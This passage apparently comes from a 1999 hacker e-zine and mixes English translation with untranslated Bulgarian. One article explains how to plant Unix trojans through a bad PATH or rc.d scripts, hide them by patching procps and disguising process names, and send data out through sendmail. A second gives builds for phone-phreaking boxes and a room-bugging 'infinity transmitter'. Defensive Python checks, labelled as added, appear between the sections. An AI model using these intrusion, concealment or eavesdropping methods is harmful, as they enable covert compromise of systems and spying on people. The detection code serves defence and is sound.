 encourage destructive trojans, but, in the end, such things exist too and
 should not be ignored).

     2.1.4. Using an incorrectly set PATH
     ------------------------------------

 The environment variable PATH specifies a list of directories that are
 searched when a given program has to be executed. The order of this search
 is determined by the order in which the directories are listed in PATH.
 The variable is set when the user logs in and is configured in the files
 .profile and .login (and the system-wide PATH - in /etc/profile).

 If a user puts the current directory as the first element of PATH, then
 programs from the current directory will be executed first. Programs with
 the same name in other directories will be ignored.

 This is how you can get the user to run the trojan himself without
 noticing. Well, you have to count on him not seeing it, of course :-) For
 example, you put your own cat command in the directory where the user often
 works, and watch the show.

 The advantage of this method is that you do not need to know the password
 of the user, only to have write permission in one of the directories where
 he often works. That way, when the program is executed, it will have the
 privileges of the user you are attacking.

 This kind of trojan horse can also be combined with some of the previous
 types, for example when it is started, already acting on behalf of the user
 who started it, it moves itself somewhere and adds itself to the cron
 tables, etc.
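
 A check for the PATH problem described in this section, as an added example
 that is not part of the original article: it flags PATH elements that mean
 "current directory" (".", or an empty element), relative elements and
 world-writable directories, and lists executables in a working directory
 that carry the name of a command found elsewhere in PATH (the planted cat
 above). Function names are this example's own.

```python
import os
import stat


def audit_path(path_value):
    """Return (index, entry, finding) for every risky element of a PATH."""
    findings = []
    for index, entry in enumerate(path_value.split(":")):
        if entry in ("", "."):
            # An empty element means "current directory", exactly like ".".
            findings.append((index, entry, "current-directory"))
        elif not entry.startswith("/"):
            findings.append((index, entry, "relative"))
        else:
            try:
                mode = os.stat(entry).st_mode
            except OSError:
                findings.append((index, entry, "missing"))
                continue
            # Anyone can create a new file here, sticky bit or not.
            if mode & stat.S_IWOTH:
                findings.append((index, entry, "world-writable"))
    return findings


def shadowing_files(directory, path_value):
    """List executables in `directory` that share a name with a command in
    an absolute PATH directory, as (local_file, shadowed_command) pairs."""
    here = os.path.realpath(directory)
    commands = {}
    for entry in path_value.split(":"):
        if not entry.startswith("/") or not os.path.isdir(entry):
            continue
        if os.path.realpath(entry) == here:    # do not compare with itself
            continue
        for name in os.listdir(entry):
            # First match wins, as it does when the shell searches PATH.
            commands.setdefault(name, os.path.join(entry, name))
    hits = []
    for name in sorted(os.listdir(directory)):
        local = os.path.join(directory, name)
        if (name in commands and os.path.isfile(local)
                and os.access(local, os.X_OK)):
            hits.append((local, commands[name]))
    return hits


if __name__ == "__main__":
    path = os.environ.get("PATH", "")
    for index, entry, finding in audit_path(path):
        print("PATH[%d] %r: %s" % (index, entry, finding))
    for local, shadowed in shadowing_files(os.getcwd(), path):
        print("%s has the same name as %s" % (local, shadowed))
```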

     2.2. Concealment
     ----------------

 Standalone programs cannot be hidden from the process list. Well, you can
 do the sysadmin the favour of installing a new version of procps for him
 without his knowing :-) Although that is not an easy solution.

 On the other hand, all sorts of techniques (tricks) can be used to mislead
 users, even if they do see that such a process exists.

     2.2.1. Process names
     --------------------

 When the program is going to be visible in the process list anyway (via ps,
 top, etc), it is at least good for it not to stand out. Exactly what name
 you choose depends on the circumstances, but there are still ideas worth
 mentioning.

 The Apache web server, for example, usually starts several processes of its
 own, which are restarted after serving a certain number of requests (to
 avoid exploits). If the system comes under heavier load, more processes are
 started. So on such a machine nobody would pay attention to one httpd more
 or less. Here, for example, is my own little machine:

   PID TTY      TIME CMD
    89 ?    00:00:00 httpd
    90 ?    00:00:00 httpd
    91 ?    00:00:00 httpd
    92 ?    00:00:00 httpd
    93 ?    00:00:00 httpd
    94 ?    00:00:00 httpd

 Che  i  proces,  startiran  ot cron, izglezhda po sushtia nachin! ;-) V tozi
 sluchai si krushtavate troianeca "httpd" i niamate poveche grizhi.

 A  mozhete  da  si  krustite  procesa  i agetty, naprimer, no togava, ako se
 zagleda  chovek, shte pravi vpechatlenie, che ne e na opredeleno tty. E, vse
 pak e po-dobre agetty, otkolkoto my_trojan_horse ;-)

     2.2.2. Pri izpulnenie chrez cron i at
     -------------------------------------

 Kakto  veche  spomenah,  tozi  metod  e  dobur  v  tova otnoshenie, zashtoto
 procesite  na  praktika sa v pametta samo po vreme na izpulnenieto si (koeto
 mozhe   da   zaema  suvsem  malko  vreme),   kato  po  tozi  nachin  ostavat
 nezabeliazani pri preglezhdane na spisuka na procesite.

 Za  smetka  na  tova  puk se vizhdat pri list-vane na cron tablicite i na at
 zadachite.  Tova obache stava dostatuchno riadko, za da e gore-dolu sigurno.
 A  i  mozhe  da  se  izpolzvat zabluzhdavashti imena (naprimer niama da bude
 oburnato  mnogo vnimanie na startiraneto na niakakuv si atrun, makar i da ne
 e ot /usr/lib).

 Osven tova mozhe da se popromeniat komandite atq ili crontab, taka che da ne
 pokazvat opredeleni raboti.

     2.2.3. Pri izpulnenie chrez rc.d
     --------------------------------

 Pri  dobavianeto na troianski kone v rc.d-scriptovete triabva da se razchita
 na  tova  potrebiteliat  da  ne  zabelezhi,  che  se  startira  dopulnitelna
 programa. Za celta tia triabva da se dobavi v

     1. Golemi scriptove, ili
     2. Scriptove, koito se pipat mnogo riadko,

 a nai-dobre e kombinacia ot dvete.

 Prosto   za   da  imate  predstava  kude  tochno  da  slozhite  programkata,
 scriptovete sa obshto vzeto slednite:

 rc.0, rc.6 - these are scripts executed at system shutdown. rc.0 is
 executed on halt, and rc.6 on reboot. Often the two are one and the same;
 on my machine, for example, rc.0 is just a symbolic link to rc.6. I don't
 know what you might need these for, since it is a bit late to run programs
 right at shutdown :-)

 rc.4 - this is a script that is executed on transition to runlevel 4 - xdm.
 This one is really very rarely used, because nobody is crazy enough to give
 up the text consoles. Whoever wants graphics will start it without going to
 runlevel 4. So this one is not recommended, unless you know for certain
 that the system runs in runlevel 4.

 rc.K - on transition to runlevel 1, which is single mode, this script is
 executed; it serves to kill all processes. I don't recommend putting your
 trojan here - it will be killed. And you won't need it in single mode
 anyway.

 rc.S - this one is executed when the system boots. It turns on swap and
 calls rc.modules, rc.pcmcia and rc.serial.

 rc.M - a script executed on transition to multi-user (i.e. right after a
 normal system start). In my opinion this is the best place for trojans,
 together with the scripts it calls, which are all the remaining ones -
 rc.cdrom, rc.inet1 and inet2, rc.atalk, rc.font, rc.ibcs2, rc.httpd,
 rc.samba, rc.keymap, rc.local. Note that not all of these get called.
 rc.inet1 and rc.inet2 are suitable.

 rc.cdrom - initialization of non-ATAPI CD-ROMs. If there is no CD-ROM or
 the CD-ROM is ATAPI, this one does not need to be started, so it is very
 likely that it really is not started.

 rc.inet1 - boots the basic INET system. It creates the loopback connection
 and sets up the local network, if there is one.

 rc.inet2 - this one boots the whole INET system. It mounts the remote file
 systems, starts syslogd, portmap and inetd, as well as all other daemons
 needed for networking. A perfect place for trojan horses.

 rc.atalk - loads the AppleTalk daemons. Rarely used.

 rc.font - sets up the fonts for text mode. Don't count on it, because not
 everyone fiddles with their fonts.

 rc.ibcs2 - loads iBCS. A 3-line script; the trojan will be noticed very
 easily, but on the other hand there is nobody to poke around in it.

 rc.httpd - a one-line script that starts the httpd server (usually
 Apache). Again too small, and someone may well poke around in it, so it is
 not recommended.

 rc.samba - yet another short script, for installing a samba server.

 rc.keymap - no such animal on my machine ;-)

 rc.local - initialization of the local system. In most cases it only
 serves to start gpm. Not worth it.

 rc.modules - this is the script that installs the additional drivers. It is
 good because there is room to hide the start-up inside it, but then if the
 system settings get changed, someone will surely read through it.

     2.2.4. With an incorrect PATH
     -----------------------------

 With this method about the only thing you have to worry about is that the
 user may see the program. But even then you can count on his curiosity to
 run it :-) Though it is still not good for him to see it.

 That is why it is a good idea to settle on the ls command. Let your program
 be a stealth ls command... I.e., besides being a trojan, it does the normal
 job of ls, without showing itself.

     2.2.5. Trojanizing procps
     -------------------------

 The procps package contains a set of utilities for system information.
 These are the programs ps, free, sessreg, skill, snice, tload, top, uptime,
 vmstat, w, and watch. If you change them, consider that you have changed
 all the system tools for monitoring processes. Or at least in 99% of cases.

 When you set about changing procps, pay attention to the "proc"
 subdirectory of the sources. That is where the main headers and C files
 used by all the commands (top, ps and so on) are. If you change something
 there, all the programs inherit the change on recompilation. So here is one
 convenient place to dig around.

 The file proc/readproc.c is interesting, and more precisely the functions
 readproc() and ps_readproc(). They are the ones that look for processes
 matching the given conditions (for example a list of pids, etc.), and they
 must return information about the next matching process to be listed.
 These functions are at the core; all the others (the so-called wrappers)
 call them, so if you change these two, everything will be ok.

 These two functions actually walk the pids in order; if a given process
 does not meet the conditions, they reject it and look for the next one, and
 so on until they find one or run out of processes. It would be very
 convenient simply to change them just slightly, so that they reject some
 process that is special to us ;-)

 The two functions are almost identical - ps_readproc() is simply a
 copy/pasted copy of readproc(), after which individual checks were
 commented out, evidently to meet the requirements of the ps command. If you
 change one function, it will be no problem at all to change the second one
 the same way, which will be very useful.
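
 Because the change described in this section lives only in the procps
 userland code, the kernel's own /proc listing still contains every process.
 The following is an added example (not from the original article) of a
 defensive cross-check that reports PIDs present in /proc but absent from ps
 output; it assumes a Linux host with procps' `ps -e -o pid=` and an
 unmodified kernel.

```python
#!/usr/bin/env python3
"""Cross-check the kernel's process list against what ps reports."""
import os
import subprocess


def pids_from_proc(proc_root="/proc"):
    """PIDs taken straight from the /proc directory listing (no procps code)."""
    return {int(name) for name in os.listdir(proc_root) if name.isdigit()}


def pids_from_ps_output(text):
    """PIDs parsed from `ps -e -o pid=` output; non-numeric lines are ignored."""
    tokens = (line.strip() for line in text.splitlines())
    return {int(tok) for tok in tokens if tok.isdigit()}


def process_name(pid, proc_root="/proc"):
    """Name field of /proc/<pid>/status, or '?' if it cannot be read."""
    try:
        with open(os.path.join(proc_root, str(pid), "status")) as fh:
            for line in fh:
                if line.startswith("Name:"):
                    return line.split(":", 1)[1].strip()
    except OSError:
        pass
    return "?"


def hidden_pids(proc_before, ps_pids, proc_after):
    """PIDs alive in /proc before AND after the ps run, yet not listed by ps.

    Requiring both snapshots filters out processes that merely started or
    exited while ps was running, which would otherwise be false positives.
    """
    return sorted((proc_before & proc_after) - ps_pids)


def scan(ps_cmd=("ps", "-e", "-o", "pid=")):
    """Run the comparison on the live system; returns [(pid, name), ...]."""
    before = pids_from_proc()
    out = subprocess.run(ps_cmd, capture_output=True, text=True,
                         check=True).stdout
    after = pids_from_proc()
    suspects = hidden_pids(before, pids_from_ps_output(out), after)
    return [(pid, process_name(pid)) for pid in suspects]


if __name__ == "__main__":
    findings = scan()
    for pid, name in findings:
        print(f"PID {pid} ({name}) is in /proc but missing from ps output")
    if not findings:
        print("ps output matches /proc")
```

 A mismatch is a reason to compare the installed procps binaries against the
 package's checksums from trusted media. A match proves nothing about the
 kernel, which this check has to trust.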

     3. Trojans embedded in other programs
     -------------------------------------

 There is practically not that much to say about these, since everything
 depends on what you aim to do. If you want to hide processes, you put a
 trojan in procps (for that see section 2.2.5.); if you want the traffic
 through the modem to be monitored, you can trojanize the sources of the
 kernel and its modules, etc. You can also give the user a program made by
 you with a trojan in it (the standard method on Windows systems), which
 extracts itself and quietly settles in somewhere.

 Here, however, there is no reason to "hide" the horses, because to the user
 they are in fact a legitimate program. You only have to take care that it
 does not show that you have replaced the original program.

     4. General points (and in particular hiding traffic)
     ----------------------------------------------------

 However different the two types of trojan horses (embedded or stand-alone)
 are, there are also certain general points. They can be seen from what has
 been said so far.

 One thing is common, though, and has remained untouched, namely hiding the
 traffic. After all, in most cases trojans serve to transmit some data. But
 how do we hide it?

     4.1. Hiding IP traffic
     ----------------------

 If you have to hide the traffic of an embedded trojan horse, it is perhaps
 best to embed it in the program that you know the administrator uses to
 monitor his connections.

 For example, you can embed it in netstat. Or, if you know that tcpdump runs
 non-stop on a separate console of the system (as for example on ManiaX's
 machines, or on my own), it would be apt to trojanize tcpdump.

 It is possible, of course, to embed a trojan in the kernel itself, to hide
 certain connections, but I have no idea how exactly that would be done.

     4.2. Sending mail
     -----------------

 It is not rare that you want to receive the results from the trojan horse
 by e-mail. For that, however, the trojan has to send it. This can be done
 in several ways.

     4.2.1. Via a direct connection
     ------------------------------

 One of these ways is a direct connection to some SMTP server chosen by you
 that you know will forward the mail. The trojan connects to the SMTP port
 of the server, sends what has to be sent and closes the connection.

 This method is very convenient if you have taken care of tcpdump, for
 example (or your trojan is even in tcpdump).

     4.2.2. Via sendmail
     -------------------

 Another way to send mail is through sendmail, but not by invoking the
 sendmail command (which would be noticed), rather by establishing a
 connection over the loopback interface to the local SMTP port
 (127.0.0.1:smtp).

 This way the sending of the mail is left to sendmail, whose mail activity
 will not arouse suspicion.

 Another advantage is that tcpdump monitors only one particular interface,
 i.e. when it watches the traffic on the local network or on the PPP link,
 the activity of your program on the loopback interface will not be seen.
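
 Connections to the local SMTP port over loopback never reach a tcpdump
 bound to the LAN or PPP interface, and section 4.1 notes that netstat
 itself may be altered, but the kernel's socket table in /proc/net/tcp still
 lists them. The following is an added example (not from the original
 article) that reads that table directly and names the owning UID and socket
 inode; the sample table is constructed, and an unmodified kernel and IPv4
 only are assumed.

```python
#!/usr/bin/env python3
"""List client connections to the local SMTP port straight from /proc/net/tcp."""
import os
import socket
import sys

TCP_STATES = {"01": "ESTABLISHED", "02": "SYN_SENT", "06": "TIME_WAIT",
              "08": "CLOSE_WAIT", "0A": "LISTEN"}


def decode_endpoint(field, byteorder=sys.byteorder):
    """'0100007F:0019' -> ('127.0.0.1', 25).

    The kernel prints the IPv4 address as a host-byte-order hex word and the
    port as a plain hex number.
    """
    addr_hex, port_hex = field.split(":")
    addr = socket.inet_ntoa(int(addr_hex, 16).to_bytes(4, byteorder))
    return addr, int(port_hex, 16)


def loopback_smtp_clients(table_text, smtp_port=25, byteorder=sys.byteorder):
    """One dict per socket whose remote end is 127.x.x.x:<smtp_port>."""
    found = []
    for line in table_text.splitlines():
        f = line.split()
        if len(f) < 10 or not f[0].endswith(":"):
            continue                      # header row or malformed line
        local = decode_endpoint(f[1], byteorder)
        remote = decode_endpoint(f[2], byteorder)
        if remote[0].startswith("127.") and remote[1] == smtp_port:
            found.append({"local": local, "remote": remote,
                          "state": TCP_STATES.get(f[3], f[3]),
                          "uid": int(f[7]), "inode": int(f[9])})
    return found


def pids_holding_inode(inode, proc_root="/proc"):
    """PIDs with an open fd on socket:[inode]; root is needed to see all users."""
    target = f"socket:[{inode}]"
    pids = []
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        fd_dir = os.path.join(proc_root, name, "fd")
        try:
            for fd in os.listdir(fd_dir):
                if os.readlink(os.path.join(fd_dir, fd)) == target:
                    pids.append(int(name))
                    break
        except OSError:
            continue                      # process exited or access denied
    return sorted(pids)


# Constructed sample in /proc/net/tcp layout, as printed on a little-endian host:
# an SMTP listener, a local client talking to it, the listener's side of that
# connection, and an unrelated SSH session.
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 11111 1 0000000000000000 100 0 0 10 0
   1: 0100007F:9C40 0100007F:0019 01 00000000:00000000 00:00000000 00000000  1000        0 55555 1 0000000000000000 20 4 30 10 -1
   2: 0100007F:0019 0100007F:9C40 01 00000000:00000000 00:00000000 00000000     0        0 55556 1 0000000000000000 20 4 30 10 -1
   3: 0A00A8C0:0016 0500A8C0:D431 01 00000000:00000000 02:000A0F2B 00000000     0        0 22222 2 0000000000000000 21 4 29 10 -1
"""

if __name__ == "__main__":
    with open("/proc/net/tcp") as fh:
        for hit in loopback_smtp_clients(fh.read()):
            owners = pids_holding_inode(hit["inode"]) or "unknown"
            print(f"{hit['local']} -> {hit['remote']} {hit['state']} "
                  f"uid={hit['uid']} pids={owners}")
```

 Any owner other than the mail system's own processes is worth a look; local
 mail clients that submit over 127.0.0.1 will also appear and have to be
 ruled out by name.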

     4.2.3. Trojan in sendmail
     -------------------------

 Embedding the trojan horse in the sendmail program is perhaps the most apt
 solution when mail has to be sent. That way there are no connections over
 the loopback interface, nothing abnormal at all - a program (sendmail) does
 exactly what it is meant to do - sends mail...


 Well, that's all from me... If I have missed something, don't blame me -
 after all, I cannot cover absolutely the whole topic, and what you will do
 depends on what you need. I hope you at least liked the ideas in this text.
 See you soon :-)
                                                                   28.7.1999
                                                                    IronCode
 >> EOA <<

 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·#05·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-
  [ a r t i c l e ]                                         [ a u t h o r ]
  Several Box Schemes                                       General Failure
 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-

 And now that the pile of administrative nonsense about most of us
 "acquiring" the title "student" is over, the time has come for a little
 rest too. No, I'm not talking about the CON, but about sea, mountains,
 women, drinking, etc. But the rest is left for later (well, some of us have
 already rested, but never mind:) Now we have set about making a CON and we
 will make it to the end (just listen to how that sounds:) In short, this
 summer the circus is moving to the city:) All good things - "two heads
 think better than one, so what is left to say if everyone from PHREEDOM is
 together" - the poet said that. Well, at least I think so! It will be bad
 if there are 1-2 more like this and then they are forgotten. But as far as
 I know, all of us, however much we lean towards phun and anarchy, take it
 very seriously, and the idea will hardly vanish, the enthusiasm go away or
 the beer run out:)
 (B.NEIL - it shows that he is no good at all at writing intros and such
 nonsense, doesn't it??:)

 Here they come!!! This is my personal best collection of boxes that I use
 (or not yet - because some of them are new). 6 boxes follow. Judge for
 yourselves whether they can be of use to you (B.NEIL - well, since it's a
 box, how could it not be of use:). And here it is - chewed, ground and spat
 out for you by General Failure:


     I. ADVANCED PEARL BOX

 Just a few words to explain what exactly this animal, the pearl box, is. A
 pearl box is purely and simply a frequency generator or, as it is grandly
 called in English, a tone generator. In principle a properly built pearl
 box can generate frequencies from 1-9999Hz. You, naturally, tune it to the
 frequency you need. I won't write more about this box - if anyone is
 interested, there are places to find info about it. And now here is the
 other version:


     PARTS

     CD4049 RCA integrated circuit
     .1 microfarad capacitor
     1 microfarad 16V electrolytic capacitor
     1K resistor
     10K resistor
     1M resistor
     1N914 diode
     several SPST (Single Pole Single Throw) switches (2-position)
     9 volt battery
     ...and other small things lying around your home


     SCHEMATIC

                                        +  16V  1uF -
               _______________________________||_____
              |        !     !                ||     |           _
               |   _______________________            |__________| |/| 8ohm
          ____|__|_____:__|__:__|_       |            __________| | |
         | 9 10 11 12 13 14 15 16 |      |           |          |_|\|
         |        CD4049UBE       |      |           |
         |_1__2__3__4__5__6__7__8_|      :           |          _
           |  |  |__|  |__|  |  |____________________|_________[-]
           |  |  !           !           :                     [b]
           |  |__________________________|                     [a]
           |     :           :           |                     [t]
            |     !    1N914  !           !                     [t]
            |___________|/|__________________________           [e]
                  :     |\|   :           :          |          [r]
                  |           |           |          |          [y]
                 |    10K    |           |          |__________[+]
                 |___/\/\/\__|           |
                 |           |           |
                 |_____||____|           |
                       ||    |           |
                  .1uF   50V |           |
                             |           |
                          ___|           |___
                         |                   |
                         |_/\/\/\_____/\/\/\ |  1Meg
                             1K         ^    |
                                        |____|

     (I simply have no words for this ascii - a work of art:-)


     ADDITIONS

 To keep frequencies that you want to use often, you only need to put in a
 variable resistor and tune it to where you hit the exact frequency. Then
 simply put a switch (one of those push-button ones) on the line. You can
 also connect them in a chain (but only if you have more imagination and
 nerves to spare:)

             |          ___  |
             |          o o  |
             | /\/\/\___| |__|
             |    ^          |
             |____|     ___  |
             |          o o  |
             | /\/\/\___| |__|
             |  ^            |
             |__|            |
             !               !
             :     (etc)     :

     There - have phun!!!


     II. OXYGEN BOX

     (this box is named in memory of my old snowboard - RIP,
      and besides I no longer remember what the original name was:-)

 This little box is used to tell whether the phone call is being charged or
 not. Once it is connected, the box has two LEDs - a green one and a red
 one. The green one means a "free" call, and the red one means that you have
 been worked over by BTC:((


     PARTS

     1 green LED
     1 red LED
     2 short wires
     1 board
     10K ohm resistors (2 pcs)
     2 small alligator clips


     SCHEMATIC


                       |  tel. line  |
                      |             |
                |------             ------|
                |                         |
                |-----x-----------*-------|
                |                         |
                 |-----x-----------*-------|

 "x" is a resistor, and "*" is a diode

 One diode must have its anode facing the resistor, and the other must have
 its cathode towards the resistor.

 When the line is open (i.e. the handset is lifted), the green LED will
 light. If the red one lights, simply reverse the polarity of the box. When
 you dial the numbers (analog), the green LED will blink, but while you are
 making free calls it must not go out and the red one must not light. As
 soon as the call starts being charged, the green one will go out and the
 red one will light up.

 Since the two diodes face in opposite directions, only one of them can
 light, depending on the polarity at the moment. This is used when the call
 starts being charged, because the polarity of the line changes.


     III. ADVANCED SILVER BOX

 Well, this one is as advanced as the advanced pearl box above - not that it
 is anything very advanced, it is just another variant of the box.

 And again a little reference: a silver box serves to create the DTMF (Dual
 Tone Multi Frequency) tones A, B, C and D. A little further down you will
 find out what they are for (B.NEIL - hardly:)).


     PARTS AND EQUIPMENT:

     1. a pocket (by pocket understand small) dialer (in other words a white
        box will do too)
     2. a switch (two-position)
     3. a soldering iron + its respective attribs

 This improvement of the silver box will let you create the A, B, C and D
 tones. When you flip the switch, the keys 3, 6, 9 and # become A, B, C and
 D respectively. The chip inside is capable of creating such tones. All that
 has to be done is to connect everything necessary. This modification can
 also be made to phones that have a DTMF tone encoding chip. You can
 recognize it by the marking 5089 or S2559 or MK5380 or TCM5087N. And now
 the assembly:


     1. Remove the battery cover, the batteries and the small screws. The
        box should now open easily (with a little force, that is:)

     2. Open the box so that the half with the batteries is on your left and
        the batteries face down. You should now be looking at the back of
        2 boards.

     3. Find the two rows where the chip is connected. The top left end of
        the two rows should have no solder on it. This is pin9.

     4. Attach a short wire to pin9

     5. Do you see the 8 wires that go to the keypad? Unsolder the fourth
        from the left and connect it to a short wire

     6. Solder a short wire to the now empty spot of the key as well (well,
        the place you unsoldered from)

     7. Melt or drill a hole in the plastic box for the switch. The best
        place is the side opposite the one where the LEDs are.

     8. Insert the switch and fasten it well.

     9. Connect the wire from the keypad to the middle of the switch.
        Connect the other 2 wires to the other 2 free terminals of the
        switch. Now simply close the box and put the batteries back in.


 Now the switch will let you use the keys of the 3rd column of the keypad
 for the A, B, C and D tones as well.

     A keypad with a silver box looks roughly like this:

                        1 2 3 A
                        4 5 6 B
                        7 8 9 C
                        * 0 # D


     Here are the frequencies of the different keys of the keypad:

         KEY     FREQ. #1        FREQ. #2
          1       697             1209
          2       697             1336
          3       697             1477
          A       697             1633

          4       770             1209
          5       770             1336
          6       770             1477
          B       770             1633

          7       852             1209
          8       852             1336
          9       852             1477
          C       852             1633

          *       941             1209
          0       941             1336
          #       941             1477
          D       941             1633

 Of course, the keypad has no A, B, C and D unless you are using a silver
 box, which is what this is about. The frequencies are measured in hertz.

 I personally don't know what a silver box (or this variant of it) is used
 for. (B.NEIL - didn't I tell you that you would hardly find out what the A,
 B, C, D tones are for:-) I only know that it lets you get into military
 networks (or at least so it was written somewhere:) abroad, and over here
 they come in handy for access to hospital frequencies and other reserved
 frequencies (10x RamireZ). But that is because this new variant was cobbled
 together recently and we have not yet found an application for it.
 Everything in its own time:)



     IV. INFINITY TRANSMITTER

 Now then - what can I tell you about this box. A veeeery useful thing. I
 wondered a good deal whether to put it in for this CON, because I had
 doubts, raised by Spite Master, that everyone is familiar with it. Still,
 I'll risk it.

 A little history:

 I had the idea long ago, and at one meeting with Spite Master he told me
 that such a wonder had already been invented. But I said to myself "so
 what, I'll reinvent hot water". I started toiling over it and just as I was
 about to finish it (sorry, I got a bit carried away - as WE were about to
 finish it : special 10x to NEIL) (B.NEIL - hey, I'm flattered:) I was sent
 material. WE combined them and got the following:

 In principle an infinity transmitter activates the phone by a call. It is
 connected to the phone line, and when the phone rings, it transmits all the
 sounds from the room over the line. However, what you see here differs
 quite a bit from the original box. The idea is that not everyone who calls
 can listen in on the room, but only after entering a given code. If it is
 not entered, a normal phone call takes place. But I don't know - whether WE
 (B.NEIL - hey, even here, where lack of brains is being discussed, he wrote
 WE - so I'm lumped in too;) did not have that much brains, or whether I was
 too busy - but I did not manage to get this recognition working. Here is
 what came of it:


     PARTS

     390 k 1/4 watt resistor (R1,R4,R8)
     5.6 M 1/4 watt resistor (R2)
     6.8 k 1/4 watt resistor (R3,R5,R6)
     5 k resistor (R7)
     100 k 1/4 watt resistor (R9,R16)
     2.2 k 1/4 watt resistor (R10)
     1 k 1/4 watt resistor (R13,R18)
     470 ohm 1/4 watt resistor (R14)
     10 k 1/4 watt resistor (R15)
     1 M 1/4 watt resistor (R17)
     .05 uF/25 disc capacitor (C1)
     1 uF 50V electrolytic capacitor (C2,C3,C5,C6,C7)
         (preferably non-polarized)
     .01 uF/50V disc capacitor (C4,C11,C12)
     100 uF 25V electrolytic capacitor (C8,C10)
     5 uF 150V electrolytic capacitor (C9)
     10 uF 25V electrolytic capacitor (C13)
     555 timer (TM1)
     CA3018 amplifier (A1)
     PN2222 NPN transistor (Q1,Q2)
     D40D5 NPN transistor (Q3)
     50V 1amp 1N4002 diode (D1,D2)
     1.5 k/500 transformer (T1)
     small microphone:) (M1)
     phone jack for output (J1)
     9 volt battery (B1,B2)


     SCHEMATIC

     (B.NEIL - hold on tight so you don't fall over:)


 .________________________ to the green phone wire
 |
 | .______________________ to the red phone wire
 | |
 | |     ._________(M1)______________.
 | |     |                           |
 | |     |           R1              |
 | |     !__________/\/\/____________!
 | |     |                          _!_ C1
 | |     |this wire grounds         ___
 | |     |<=amplifier                |                     R2
 | |     |                           !___________________/\/\/_____________.
 | |     |                   ._______!_______.                             |
 | |     !___________________!4      9     11!_____________________________!
 | |     |                   |               |                             |
 | |     !___________________!7            12._____________________________!
 | |     |                   |     A1        |              R3             |
 | |     !___________________!10       ____*8!_______.____/\/\/____________! ^
 | |     |                   |        /      |       |                     | |
 | |     |    C4             |       /       |       \                     |2ma
 | |     !____||______.      |      /        |       /R4                B1 +
 | |     |    ||      |      |     /         |       \                    |!|!
 | |     |     R7     |  C2  |    /          |       /                     |
 | |     !____/\/\/___!__)|__!8*_/           |       |                 S1  |
 | |     |     ^             |              6!_______!     otricat. <__/.__!
 | |     |     |     C3      |               |       | C5                  |
 | |     |     !_____|(___.__!3              |       '-|(-|                |
 | |     |                |  |       5      1!____________!                |
 | |     |                \  !_______._______!            |             B2|!|!
 | |     !________.    R8 /          |                    |                +
 | |              |       \          |                    |      R6        |3ma
 | |              |       !__________!____________________|_____/\/\/______! |
 | |              |    R5            |                    |                | v
 | |              !__/\/\/___________|____________________!                |
 | |              |                  |                                     |
 | |              |                  |                                     |
 | |              |               C6 |                                     |
 | |              |             |-)|-'             R9                      |
 | |              |             !_________________/\/\/_______.            |
 | |              |             |                             |            |
 | |              |         Q1 _!_                            |   R10      |
 | |              !____________/ \____________________________!__/\/\/_____!
 | |              |                                           |            |
 | |              |                                           |            |
 | |              |          C8                               |            |
 | |              !__________)|_______________________________|____________!
 | |              !                                           |            |
 | |             /                                            |            |
 | |       -----| Q2                                          |            |
 | |       |     \                                            |            |
 | |       |      >                                           |            |
 | |       |      |                                           |            |
 | |       |      |                                           |            |
 | |       |      !_____________.                             |            |
 | |       |                    |                             |            |
 | |       !__________.         |                             |            |
 | |                  |         |                             |            |
 | !________.         |         |                       ._____!            |
 |          |         |         |                       |                  |
 |          |         |         |                       |                  |
 |          |         |         |                       | C7               |
 |          |         |         |                       '-|(-|             |
 |          |_________|_________!_______.T1._________________|             |
 |                    |         |  1500 )||( 500                           |
 |                    |         |   ohm )||( ohm                           |
 |                    |         !______.)||(.__.                           |
 |                    |         |              |                           |
 |                    |         |              |                           |
 |                    |         |              >                           |
 |                    |         |            |/                            |
 |                    |         |       +----|   Q3                        |
 |                    |         |       |    |\                            |
 !____________________|_________|_______|______!__. D1   C9                |
                      |         |       |         '-|<---|(------|         |
       .______________!         |       |                        |         |
       |                        |       |                        |         |
       |       .________________!       |                        |         |
       |       |                        |                        |         |
       \       |       .________________!             C11        |         |
       /       |       |                       .___||____________!         |
   R13 \       |       |                       |   ||            |         |
       /       |       |                       |                 |         |
       \       !___.___|_______________________!                 |         |
       |       |   |   |                       |     R16         |    R15  |
       |       v   |   |                       !___/\/\/\________!___/\/\/_!
       |  negative |   |                       |    D2           |         |
       |   B1,B2   |   |                       !_____|<__________!         |
       |           |   \                       |                 |         |
       |           |   /                       |    .____________!_.       |
       |           |   \R14                    |C12 |   TM1      2 |       |
       |           |   /                       !_||_!5            4!_______!
       |           |   \                       | || |              |       |
       |           |   |                       !____!1            8!_______!
       |           |   |                       |    |     7 6   3  |       |
       |           |   |                       |    !_____._.____._!       |
       |           |   |                       |          | |    |         |
       |           |   |                       |   C13    | |    |   R17   |
       |           |   |                       !___)|_____!_!____|__/\/\/__!
       |           |   |                       |                 |         |
       !___________|___!_______________________|_________________!         |
                   |   |                       |                           |
                   |   \                       |          C10              |
                   |   /R18                    !__________)|_______________!
                   |   \
                   |   /
                   |   |
                   !___O J1

                   output



     LEGEND

     resistor:                     -/\/\/-

     switch:                        _/ _

     battery:                       -|!|!-

     capacitor (electrolytic):        -|(-

     capacitor (disc):                -||-

     transistor:                    (c)  > (e)
                                      \_/
                                       |(b)

     diode:                            |<

                                       _    _
     transformer:                       )||(
                                        )||(
                                       _)||(_


     ! denotes a connection between the wires. FOR EXAMPLE: _!_ means a
     connection, and _|_ is just a crossing.


 Kato se ima w predwid, 4e ne sym osobeno umen w taq nasoka i w elektronikata
 izobshto,  shte  kava samo twa deto go pomnq, a ne twa deto edin spec she go
 widi wednaga na shemata. Zna4i, infinity transmitter predstawlqwa usilwatel,
 wyrzan  kym tel.liniq 4rez transformator. Shemata se aktiwira 4rez promqnata
 na  woltava  pri  zwyn na telefona. Towa wednaga zadejstwa tajmera, na kojto
 pin3  e  polovitelen  i zadejstwa transistorite Q2 i Q3. Tajmeryt TM1 ostawa
 zadejstwan  za  opredelen period ot wreme, zawisesht ot stojnostite na R17 i
 C13 (obiknoweno e okolo 10sek). Kogato Q3 se wklu4i ot tajmera, toj simulira
